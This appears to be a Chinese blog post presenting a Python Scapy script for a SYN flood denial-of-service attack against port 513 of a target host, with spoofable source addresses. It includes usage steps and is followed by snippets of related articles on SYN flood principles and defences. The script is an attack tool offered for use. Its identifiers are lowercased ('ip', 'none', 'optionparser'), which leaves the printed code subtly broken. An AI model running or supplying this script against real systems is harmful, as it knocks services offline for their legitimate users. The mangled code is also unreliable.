使用Scapy製造SYN洪氾攻擊

2021-08-14 17:37:10 字數 1029 閱讀 7721

#!/usr/bin/python

#coding=utf-8

from scapy.all import *

import optparse

def synflood(src, tgt):

# tcp源埠不斷自增一,而目標埠513不變

for sport in range(1024, 65535):

iplayer = ip(src=src, dst=tgt)

tcplayer = tcp(sport=sport, dport=513)

pkt = iplayer / tcplayer

send(pkt)

def main():

parser = optparse.optionparser('[*] usage : ./synattack.py -s -t ')

parser.add_option('-s',dest='src',type='string',help='specify scr address')

parser.add_option('-t',dest='tgt',type='string',help='target address')

(options,args) = parser.parse_args()

if (options.src == none) | (options.tgt == none):

print parser.usage

exit(0)

src = options.src

tgt = options.tgt

synflood(src, tgt)

if __name__ == '__main__':

main()

使用scapy製造一些再有tcp協議層的ip資料報,讓這些包tcp源埠不斷地自增一,而目的tcp埠513不變。

先確認目標主機開啟了513埠,然後進行syn洪氾攻擊:

syn泛洪 過濾 SYN泛洪攻擊原理及防禦

拒絕服務攻擊時,攻擊者想非法占用被攻擊者的一些資源,比如如 頻寬,cpu,記憶體等等,使得被攻擊者無法響應正常使用者的請求。講泛洪攻擊之前,我們先了解一下dos攻擊和ddos攻擊,這兩個攻擊大體相同,前者的意思是 拒絕服務攻擊 後者的意思是 分布式拒絕服務攻擊。不要看這兩個攻擊前乙個比後乙個多了乙個...

SYN 洪氾攻擊以及如何解決SYN 洪氾攻擊

在三次握手的過程中,伺服器為了響應乙個受到的syn報文段,會分配並初始化連線變數和快取,然後伺服器傳送乙個synack報文段進行響應,並等待客戶端的ack報文段。如果客戶不傳送ack來完成該三次握手的第三步,最終 通常在一分多鐘之後 伺服器將終止該半開連線並 資源。這種tcp連線管理協議的特性就會有...

Python實施SYN泛洪攻擊

python的安裝我就不再 懶 贅 得 述 寫 了,為了方便和速度,我們用清華源安裝scapy 這裡用python2和python3都可以,我編寫的指令碼相容了兩個版本 pip install i scapy等待一下,基本上就安裝好了,如果報錯,那你就執行pip install pip upgrad...